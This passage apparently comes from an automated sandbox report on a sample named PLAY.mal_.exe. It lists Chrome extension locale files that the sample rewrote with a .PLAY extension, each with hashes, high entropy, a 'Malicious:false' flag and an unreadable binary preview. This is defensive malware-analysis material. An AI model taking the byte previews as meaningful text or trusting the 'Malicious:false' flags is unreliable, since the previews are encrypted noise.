        SHA1:CC5311DFF4E886B27C4E28822883E75767C44B74
        SHA-256:2DAF38076380BF6EEB8257F51F79480BB831F08003924F398992D35756FBB82A
        SHA-512:05F8D6DD8CEEE55417CE9DAD9E63F8BC00FC895B8CEE00ABC31E495CEB6CF0025482684DF69FC5368C30AB2B4E68A5D10EB22A309DF25FD19C24996F0D68E6D9
        Malicious:false
        Preview:..1..%.\Y..5.o(..j.......?}..QcG.g.fu]<..Q..B..&FU9.s...["....5...|+.^r.IN..H^).o./..o...w...;b..iz.t%iZPw...kE{.7...&%.MF..`@c......X.(.Fy..M... ~..-m..`.p_0...c.lj8..C}...).N.m.#..C.{(........sT.....i~....;,I...x..P. n...A.L.D..vt.*.BVmct..V....\....Zq..D.DUy.m......,h.%.{%.2.}...r..S.aa.@....5i\.).J....4......T..:.I....z4.%.g..I.1..g.......P.W....S..S`>c,.TPp@.o.i.ho.0./}2q......;..Z`t.k.%.K..m.J3.M...}.6....kf..C..."j_....4..B..!........+L."N.....r.....].qS..m.!..r.;/..e.....9.R~.....u.U.O..5_.1D.c....[X-xb.....q.....We.&;F....-Ue.......vH...F..=.A...3....i.7..Rz.3K.>..k5VC....AOo...>+..p..8.....^4.F...MN.Vr...Oi...C....=..A.?.......9..fI...............+..........e.B.V.D..e.I...!...)...{m..94*.I..O...P#.5+.FJ%M...0..^..K.[2.V..3...t..U.....J]rg...*.I..j.....{._.b..5.....3..H...n..k_}.RG:..C...h.e`g........K..g.Pzvq...R_....|A).\R..7.I......F.suU..J..vs.b.#s.Df...L.A.8R.8.....T..U.|.!.I>...........................M..{M..:=.Zg&...:..p..S..8..

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\cy\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1880
        Entropy (8bit):7.899451264667051
        Encrypted:false
        SSDEEP:
        MD5:1F809E09170B76209666BB6B277DF192
        SHA1:1B85AD4BEF0D1AD3B472BD4F13F2A4372E197499
        SHA-256:50B8420F5E583F62B39B8FB6E369A72B6B083A5703DE5DC95A1DA607CFE94F77
        SHA-512:B4591F4515285B2E45D1BEB10578CD9D759F012C273DAE3BD5C28F8821D1D008B66FA57E0382ABE90832E9F4AAE215E3A772FA4A4E287D30F484DCD6A433D2A1
        Malicious:false
        Preview:.w..V......j}9..j.....<..vN.:st.&/.z..A"..t.b.z.+s...x.XGhyD...8.4.....)......|..?kt[../&7.5.J...o.... ...-.<..#a.?U%^.d.d.`.(..@^..O..u..J}....\0r|..&.$.#..A.~d. $.. N....97..zZ..Vm.c.l~..M%..J. ....Z.~....a.L...,.$^...".\.L.Y+.] }]..LO.{..[G.......w-.*...'....o?'.8..S.i..(.R"..3..5.z..V..%.../.K.$.:_..G....dD...5...bRb..b..].\dG:.!F..!.$....Vl....w...8.....T.!..6..S+..........Y..%...........8..>...........P.@......F....e@...G...B.=NI9.L...>Vf.k,.Fq......);.|..#5...#......B.J.....a..#9...|F..Y..|...r~.V..e..kH]...U.%S....S..p..a..4....e.=.'F.....L.r.._8..f.W...Mn.EZ.B.^Yg.H..D.[..e..F._...2S.... .>y@.J...............@_Z.j..R....\.i+.X....&.Z.$.Q]Q...|..!.2..........h3.j..=kVp...N....>....L.3h..+......j.]6...K.%.j."..~...&.-.!.c.I.^{'....Yq......-m..y(u....9...T..U.|.!.I>..........................S....R.og.).....?....H..M-n,.r.EY..Ud...)"T..0J.u<...CG.)f..v..t.]...r.f.Z.(yy...%.o...Hv.9...I....^.;`..sFm..eY..}..hA.5 `.. v`.......A

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\da\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1960
        Entropy (8bit):7.895397626922585
        Encrypted:false
        SSDEEP:
        MD5:16EC05C30596BB90ACC34E15561C233F
        SHA1:49DDD3F3FCAEB80505B9D4A10630344EE6BF8122
        SHA-256:431A928D4466D6ED51DFA9FCC8C21FBA263BBAAF674F66604DBA3850FE63A062
        SHA-512:C38389A3B814FB3564678BDF02441AB6F7967D8915BCA3287D6C247D8EE5AF3187BFA2D0F3CD8E222C5F54D2CFFD791B5A7E5193DDD8668CE0B04ECFFC7905FD
        Malicious:false
        Preview:`I...+-e".a..... ..+..0.._.)\.m...^P...f...Jqq2K...07.I..F..f=sZ...C/F.O..).W........0[. .@.D.....57.E.....r...6.gT...>......,!.E...g..[.$..$:...a.{.I.'..$..=um.(.."L[..R.......#......(..2.I....$.O~..q-...+..V..f$s.B:...X.yT..H.c.NJ.. ...].,....}.]..2UqVn..59h.}}......C.I.2/l.(.6....W..W.>.......H...j.X...W.e5.6..s.b.Q.?.....2...m-=.......6....v.Z..BE..M..........j.%..*....9/W.v.g.C...w.{...vA-P.05.......!d.^0g)8P..dz...;.....E.'Y.e.S...u,;".i.....@..O.../....%...!........M..*..f..aD[..3.........9D....n.i8.......X9_.P...B-...6...SdD)-..Bl1.u.......u... ..............#A.c..[.Pwi...[!....z.".0...%+b8.k.......a..A...m....".Df ..%.......5g......7...>.c.A$.....F.A>=QM...(..O.9.2.NLu.....eMp.h...k...x.l.v....-.58{.w",.:.C.;.T.&.w.#.LO.P..cEo...tg....4..R#..(.f........*.RA...TL.._...}h.....-.....n=.@WG.^.x..R......./.iC.u..i@...........Ba....T..U.|.!.I>.........................._...OD...s.K..*q2.!x<.....<...b.w.....{...%.S..h...{.G..Lo.O.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\de\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2104
        Entropy (8bit):7.9096595113664305
        Encrypted:false
        SSDEEP:
        MD5:06D46B8EE538BB70428DCF4E1C91D3A8
        SHA1:FCF06FC3FB2EB9328BA4B24459F1868312BB8B77
        SHA-256:C8CC2241F64F8E6CEC9C6984F4C9574F8E7B41FD00E7A9EBE4CEA3B451AEB36B
        SHA-512:480932A9FA4234ED1E40C66EA4C3036C8E6930C9A437B4B2DF4B1B5BACAE92F2505032FC722D2E41FC47308ACD7C3671A067F5F9B0F5FB7F6B3943E5373160EC
        Malicious:false
        Preview:.....Au..k.5...o].[,.89|'#>=<.P.&.E0..4b...,..tx.Cq.P..)3..(...oz ...a.R..J..?.,.-..X...6.`..uD....q......KL*.tB}7..O|.....q.E.KZ..y.(../!.`...#...lov.RO.J...4[...b......\EV..0.Xk.(..(...[B..h.....m..pE...N.f.?.a...T.......'.....l.\...f...'..l<A.jn.}..8|J.+^u....f..lw_b ....GyO2.......m..I?,..]..4.v.x..pM...fx!f..E..r.C...R4L_....|h.t.j...D.y......a]}67..g...I..f..g.2.s.m....Cn....nf.GY....n?..9......................{.h..cu..V. .o..M..\.../I5S..D...<.....n..\......?.....o...D[.U..b...2.....!....s-d.%..7..9z4^\.......&....@u..%...A..!.:.jB.e.(..C...."...y....PG..C....{n....K.f_O@]...w...F.?.x3....aPF!..... ....s....b..).........b....{l..H...{5,....n...?.......w$Z..........[.<..............5.."Ot....SK.Xx=.'.........?..pm.%Y..L....i5z.s...I..o.Vl.E........7!1.Lg..*d.t..9\.3b9=}..k..N.;..}..x..S..$Q..#Y.MHr...9f..W..qw+B.dz*.P."c......F.]..:.#Q.BJ..G-....Z...7..P...`.....,.J.l..HTZ.h..!S..N..W..Xgt.....4....<e..K_q..........\./>.=?

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\el\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2680
        Entropy (8bit):7.925960973410862
        Encrypted:false
        SSDEEP:
        MD5:B80BC20673AA11923B0CEE0DC6C7B30D
        SHA1:916D9F93183D1191C345E40C3B368A3B04FA7B52
        SHA-256:572D7DBEAE53AF95A2B51624D524A9B20CDD34DEF444524E69EA9F2B6C3FC327
        SHA-512:616C0D6B45D08951C7DD663E390868E831E79C35B26C6EFB51D771CA8492C3E892DEF6CD9FF8D59F133478CF4C097543CFB798B7C59E5A8163BB16194B3F03A6
        Malicious:false
        Preview:.Z.5.^.........SHaOH..E.3......g.9...}.SG.KP.[.oy.e>M.v.......`;.....l'<g....>N#..`a............%.a........F..k.:?.8.........=;Q3..)&....Q5.cK.....p.......v.6.KIwWA...k2...M..A]..e.$T.}I.n....5,Ve.......SW..dN..w..1..4X1L4.m....e&......L.u!B*0.[N.y...Y.W.....S...".xZ./.-.Q.`...4....c..m}_2."`....C.I...-8.,.A*.f...[Tb......%....-{a..>Yb./..>y.O.r...c...!.h...|.......w.*....zqzO3y...fP.!.C.V...`.F.0.....[ro9q...0...q....%>.. ....g..kB..V...Yl.l......?....V.....c.m."..[.G.._?..F..q...\."...e.L.1.d......4..M.|.".p.{,.:...3..6.@!3.[.RH..s.6|..l<......KM.8..UQ?.<Am"\..l3)$..rW...ha'7#.[..........?..,..O%K..7H..d....s..Z..`...4..f..R.^......AP$kv.o..vG$..gxr...6...XL....NT._H...x...8..).gA|....@...w.....P..P.h..N.+...T2...&.L..K.)".Ht...C.......C.gS.....a.......oFo[...|....b.[$Z.k.......:.H..L.r..j(....q.S....[......_T.u........}.c1.9]....)..?..r]S...[.y.5..+.:5..]..J..Z...eP|]..'..X.....2a../~.96I...s.)I.9$.M.......r.A}.?...3F..D..El..2hMG...N......

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\en\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1928
        Entropy (8bit):7.905276614454822
        Encrypted:false
        SSDEEP:
        MD5:CD9698FC3FB2BE6F388C1A9514A9DDA4
        SHA1:F57A898D9D23F39F7A71290BD09A2DDFB3D1486C
        SHA-256:A8B86202E749BA2A39B893D1A421BFC5DCCB74F2B753B66CE965ABA0DFD6313A
        SHA-512:B95B76CE11E8B178393857DEEE40BCDB210F3DE9C714F60B3351E04287AEFF75366067FDF7DEF5DB6E2E14E4A9CE1E892BC9295F68CF16F3ADCD598CA468C08F
        Malicious:false
        Preview:................?b.[.V.8A...y.-B..l..}~...qn}.............[ ...W=.%...K......P{..3>;.v...S-....IH.t..x....{.D..+..Y.......w..m8..qS.Mv0.]..l|2!N....+..R.24.1...`$.?.}..;.6......N..%FF.^..U.Y[T.,..HZb._f...u.h.#..7.6...rm.._.@.....&}...R...B...E).}....Y....1..n.........k.......Z#.T....~...........!.vA.~v@....9t...5Q....f?V.N.........96..:N.\.M_.D..+B.Wk.....9.. .V..%....XO.b.o1...@...w:.22.....p........X.............V...0Pm.n..`r./.{a.1K.R....9.8...hz.y....N..[...S...B..CRJ.o7....E.........l..#l;{...$...L.u..X...#.Q.K3?)....p..g.pV........4.".....P......s..=d!...U.....+.P...".V...v.t....-.....h.d.r..o.l:....W..U..<:..ux\D[*d..a~I....&.=.%.....L......W.@."Yy..9.....!...kKq=.B..3..q..`\..P.QS.c.=&H..E..'.%^/.k5......Q........E.7.*r..KF..!vzI;|.DAk.q.......e.Z]...59....M..b....d......iC$.8...n.F...=.\.S.{...G*...T..U.|.!.I>..........................k..=P?$.:..b.E.4..:zY.Ey...=c.....,RT....#{..%...20A..j.....b./..&#-..)........".#m.R.....W

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\en_GB\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1928
        Entropy (8bit):7.877396114414972
        Encrypted:false
        SSDEEP:
        MD5:E61768D1AA13B23BDFC2FC87537E7336
        SHA1:4F26403366EBFA9ACAE2C4CDBF6FB5C13EF044FF
        SHA-256:F35D490E5CD5426DF7F406BCF7E8BDE97B051D3038F29CE55ED09337511B58A5
        SHA-512:4BAB7C05062CF1E67D3EE369FF2843304A03DF692E3053DB030F5DEEC8F0057C94E7B60D3880345B76B3BF90F48BC5CDCEB0C7AEA0CEF8358AC5B5282475A8AD
        Malicious:false
        Preview:..~K[.'.\.&.*.,z{R...:|...(z..\.?..._.6.E.G..'.....,s...Ue..)~..0.....9k.=.....'.2.5s......A.\....#.D..x....I8..R...6l7c8..0.sV..]>.. ..u..P.w..P.... .MK,....K*..W..w..J)(.k..9C...Y....u%y.R+...y.m2..w..E6.D.......*+Li#2.4.....q.M....;...V..DTLQ..G.y.n..[_R....z.R...(.T....s.......4...C.....@.x.....C4.(.8c...(J..;W..Mp. ..A.D.-....-.7...p..i..[...Z..M..eU...r:...U;...M.9.M.......6A.%..D$h..F..r'r.D.C.@Y.u....<.v.Z.[h.....B.s.7j+.. .....]...E.5..zo&QF..>c..{6G....t...... G..U.c.j..%...^.....CXq.ByZ..O.._I............=\Aw.5..Z..z$.4..g.ih...z,..Q4f.W..N~.|....,cY...{.k|.f..a.4*..xHy......O.ox.......v>...U..7../z....+^&.a_zT..8F-_c...3X...*dK.Ml..s|..S_...x).......o...L....q....M...r..%f'..3........&.... ...7 .;......DB...y.w..q.X.\...#.....10.y......S.<.%a.......u.......v.....S9..`.^7.s..B........H...2i..,.S..g.......T..U.|.!.I>............................y"....h.$*...._..2+.......bP.".P...{..{...X."c..^1a...s7.G.N.K.6.6s.....A...I..=%C'C#\(N.k..

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\en_US\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2504
        Entropy (8bit):7.928841060497095
        Encrypted:false
        SSDEEP:
        MD5:0EB3F841297D06AF08F124001A6D04F6
        SHA1:340B41B2A1A32B837BEB4CAA30625AE83A2F5DEA
        SHA-256:0A1770FD219459A24EA5A40234EAFEBE2B1599685E2A4C1CDEBFF4E53E1547B6
        SHA-512:D525F2569D57E542D27D0432A128ABF4DB7B449895C8371479E36CF979F96CC8B33E03649F47CE356F59CAD8B8AF6B2A507C4F23D060DF230AD6778296B4E49D
        Malicious:false
        Preview:<(..4..I{.0zd..'h.^.X.m z..=!...Nf.B/.a)k.}...2bv..x^......*.2k..CLz_|J.[.l.z.c..rz...T)Y(.....Q..{.....PX.V_.P........x%........~...RJ(H..0.:.|....4..>..#.Q.u...+.....{..}+...G.)i.Us^t.i>..m{8.._&j:{t.E.3..x.=..LM..]3R..aI`...?..5..v...Kk._"..K..k.DA.E.`...hX:z./,...U0~.W(.CBds5E.v..9...7...*..2..I.3...>...k..q.l.'.H.i.q.x.~D9.\....2.`..F.vE=.C^Rn+.B..MI."..:.s..<h .&.~.#.L.....m...~FH..Of.w....T8....._..GB.....NBK..Y.'.....(......w..+.C......\y>..UW.Z ..c....w..?.w..}.mH..7.`M.....a......... xu.+~...c.*...q..r....`.{C.....q....p>5qo.:.h&;...3x.u?.K..IW+.Z}B.b....3<7..T.qp.xx....L.*>...w.)..k....{D.C..l..OW.P.....7.."d..;.K..u.......f..|...._j5=....P.Xj......-j...t.^_....f..7u...#*..|/9p..B.:.....EB.....>.^,C....qh..:?./8..m.....U....?V).$B....d<;.9...L9.{..S}.'.gh.....ye=..0k.`i.....SV...?.....F..p_5..U...;.9...<H{...:..{]/.1...| .i.t...Z%...*..B.b..`,[.u.S.3...q._...Yn.K..:....m,A`......H.......].../..Xf5&..<.xC'.....OI...Sz..`@9..n...&6..<.

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\es\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2040
        Entropy (8bit):7.895262746369068
        Encrypted:false
        SSDEEP:
        MD5:ED3E0EBA18084EB616EEDE1D9A0054AB
        SHA1:EA6FE032DD0422E5BADA2A43241D51C8A732E0B7
        SHA-256:154A7315B2F1628D38AC11F5B1CF9B4BD3215327C02AE2783C274E0F7CAC02AA
        SHA-512:782C06B1D2316E46B3A0790FEB21068EE1A3ABE9E7A05ADAC17055B9B2A5447EC8396823FD57040E4D0C820F494EF0687D2D46F825DEE625F6E27C08C6F18B0E
        Malicious:false
        Preview:....U.;"...94...q.[.M.a.v=,#.Bt.h5..X..2..\9P.;`yN..R,....[=....'l.........Nc......G.....oh.Wn....A2.F...n(.:"...eYC...Z...'..>.+.\...sO..3.z.n..^.f .....m.%.t.[.;.@.C....|.v[......5=...W.....2..*$#;q...E.("..."[..L.R.rr..h.#...._..r._..\c....fL..l...:w.U.. .f..7....2..m..N.l.`...-..=L....s.b(@.0F)......d.......XY...u.Qq.USv.M<.L...3..qb...[..y...Y.7.....,[....ti/.YX....ha.c.i...!......^@C...|..O.qm.M7d..@1a....t6.......{...:.N..<^.A...XKP^....1f.....U:.ayY.|...Z......Q.L...*...{Ru...(.+K..-...A.).".y\.{...Ee.R(.......,...KoO.t.e...j(./l..Rr.i.0v.....Q?.E.>..{}fL...N.ad...S..!A.L.c..^.y......]s..VSS.6<........X{+.7...7.y.f....JrP..{..`o...L...%...#H9.4d..Z......E.|.p..F.0.....*.>...7.q..j\..o[D....F6.\...x.''..{k|.(>../.'.i7s..M.X....zv9...gd..o.4W[8],....F.....Y6...&.+.v..+_.Q..8.}.e.{..!..+o}.......lr...aq.#...#.....~.ud.]*..Q..?.W.....0.z.m....H...H$.....kAJc(...9HM.M.........}6M1......8.. CI....h.h6...74...5.&mO...T..U.|.!.I>..........

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\es_419\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2024
        Entropy (8bit):7.884125734436565
        Encrypted:false
        SSDEEP:
        MD5:D5912562DF10C211E6852E9F0D748E93
        SHA1:2542CF2B7577C650E69D1F851631E5FE907E6165
        SHA-256:7094B902EA7DF16A2D01EB7C75C349DAFCECFA6913319D6921EFD1E03E374E73
        SHA-512:34BA028D221860AF6B36677EB21E856D39F2B09F121C63EA7951B5351C25BD0C4FEBC0B06667A471B1B586424EE7B5B71F0DC2B6620F179EB5D25F93D4E3DB7C
        Malicious:false
        Preview:%c2)h..$.....A..8Rp.@.R.;.Z....HU.....].u.o.+..]..1l...i^.-.g.T.Y...2. .R.?8......8.f....J.).E}.7.e....\..tC..0PiS.X.&...v.sI......V.1Q.R.R.s..$...*".>9.....9_.....ZW.i.?...........N.....n$.'.kx.J.......'..Kl;..e.!....!}...#.;~.C...).jw~.X.D.i....$......J..p.....maGx....{...XX%G[K.f&..1.7...[.....n=k....._4W.tOT...;.w&.K....Mm...B|:C8.>p......k..wC&.[C\......r[.x......A.d..{m....l.."...!..S.H..AT..j...u..f>.:U.7.4...........d....$6.%=..J4fK.HI+...J.-. c..s8<8.fS.f.S.1..Y.?$;_...f.(.]0.V~5NE8...B...3.....b."9.....B..d<..X...1hL/.n.XU|.Y.u.\......v.Er<....v..3.<A.0.;i.....X5..{.....S.`.K.h../.H....>aE.w...,.]7...n.....:....X......\.M..f.!.......9......\.....r.:...j..Y.8..A.+...(...LX...#....$./.1...''3.f=r..+...b.....l..97*F.... 8d.E...[%v...`.^x.|=U...L.[!.!.0.+2zU.f..;\.P3.....3.PRH...?)k...V:g.....*7...A'.X!..6..`.3oW../.lT.)C.....!.%9..<.vn.E....'X.D,h.[9...K...TQ..(.;.f...n...1h}.c.../.&l..]i..=...T..U.|.!.I>..........................

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\et\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2040
        Entropy (8bit):7.897281885302038
        Encrypted:false
        SSDEEP:
        MD5:F6B6190363E81B266F58AB53887ECD7B
        SHA1:2B7A57321A1D1AFE2817457F62388443E4D07518
        SHA-256:D08B840D4DC189B58E8A6B465D26C378EABA760D2317D5656EB8537C0C80EDAF
        SHA-512:1D9EBFD5B94B8242862DF3F05AD941509B70DB1FC3ABA1C18F2521F582D64511EE3FC04394A440ED07F227EC7D86B0F65D79E073F1123CECFE3873E651BBE8DD
        Malicious:false
        Preview:Z..w.....*....2.P...h_s..W.m..y.zT.mx?]~jJ.M....@.~..>.{.*.$c/....X.,1.\.X..t...adf)OB.>.'.]."..!. u.h.0.*.P.T..K..#&.;......+D"A@^?.v*.b....H.)....n.W..vtf..uk......s.8..k$..w..y.R..,.3s.V9?RS/..2b.....{.(...}.......R.\.s%.....nD.....#..L...Jn\.d'..i.F...s....-*l..:q.....L..iQ.{..n^..F..dtD.W4"..weo.C.......P}!v.~.h.3[.j3UP.h}.ln"..'^`.......M..+.....^.h.....As.....dx...88....?I. 9...V.=.%..)..Ov.~.h..+m,.O. .W^&....r....~Mf..~Zu.2.cU.{...u.'G.^1Q..r.=p...B]....m ...q^.t...E]....g......1L...K.....|.M.k=.."...#.3.S=.p.n.~..m..i...&..}....X......#Hz.iU.v..2.j...N{.=...........TM...9..C..N......3.Vl,."iC..+!..U....... ...a.|].6.H.T`.].?... Rdq...~.K.2lu}Y....\..6...}...=<@.y.v>...g.f;..oW......XU...........\.y$E...9.4.>\`..C........1......P..!..0...)M..4......{z:*Q.P.Rr.\...u.u%*'d...kG.@,<..5.k..B4.2..-'...u...x..a..!.D.a...."{..&..L*..e..!...(z.V..+..7.8*.Fnek.2KO(QR..vw}%..%..k^.......~...K.Roz.".Gt.....r....T..U.|.!.I>..........

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\eu\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1912
        Entropy (8bit):7.8893132963292
        Encrypted:false
        SSDEEP:
        MD5:CCCBB8B9721AE19D42686F72632A1198
        SHA1:BE1756A47086C334630120882F588F2D66D359DB
        SHA-256:1F2ECC428DBB4B522D4F91A5714F3D04EBADCAFF9082565C2E2ECEC0D70CDED9
        SHA-512:C98C678D4E163FF8CB029386D61C80E504844CE4736EC50DBD996B1A93A6CDB607F1FAB037E830E714C871C9AE33F4BB6B40A3C2BD2C9D0304657EC52B604C0A
        Malicious:false
        Preview:Zj.N1+..S.5.J..,..........S.X....W....X...3....O.r....l.j.......q.Km&.:L...t.S"....gB...^/.)......,#.w..+..5%@O..8. 5..^..i...!.G..O..ag}......#.......R...{X..M .I.b...u.A.U..QSh.\Z..U.t...Og.x[GHF.f..../.;.k..D..\.......'...E......N.,?...e.R....../.J...".q.......O;...K..P..q..7...9.y..O.9..SX.........9}.....%(..J`.}..x..'I....n^.6x..b...2b.G...t...K..&W........+.....%:6..`.P....[....Q..SkO\Rj...J..r{...s...h.j...2..g..hQ.f...................tq.....X0i.bY.B$...I/..4.2.|.M....~....WN.c........@.a..z[.g...-....OX3..F..s..y.4]l.V.]........cdp.f.<...........I.......c..+..b.v.AUc..'5T..g..!.6......t.....H.....R2...P..>|(.(..Q......d...}.cw....?.La.............V.-.IG.. >...lRP.t.N_.,....K=...O.....i..F..-.zc.l.........sS..b...;+s...P.YU...).....2G.3B.<....^.r.3~...>~.z..&.Q...............T..U.|.!.I>...........................:$i.1r[..I.t.."/.'}.Y.dgn...C...fH.m.+%+.<W.[.W..H.F..5e-...'E........}..v.R...*p.C.M.0hL..l...`S|....i_

        C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\fa\messages.json.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2376
        Entropy (8bit):7.915731973048769
        Encrypted:false
        SSDEEP:
        MD5:0F9EA7095D5AD76DE756B248A7A34D81
        SHA1:2B6A34370CD6515672C4EB9FEF6CB233BC35BAB2
        SHA-256:A6DF9CE4846DAFC90DE2C0AE00BE926280454B5BC8F5FE9E17EA6C3C1ECA6646
        SHA-512:6F84F42180E8145B28FD88180EC261E6BF2952EB9E1B358D13822A3ED3675D2AD748197A43686060DD143DE70163737F0387344A1F8B1B541DBFD7209C77A167
        Malicious:false
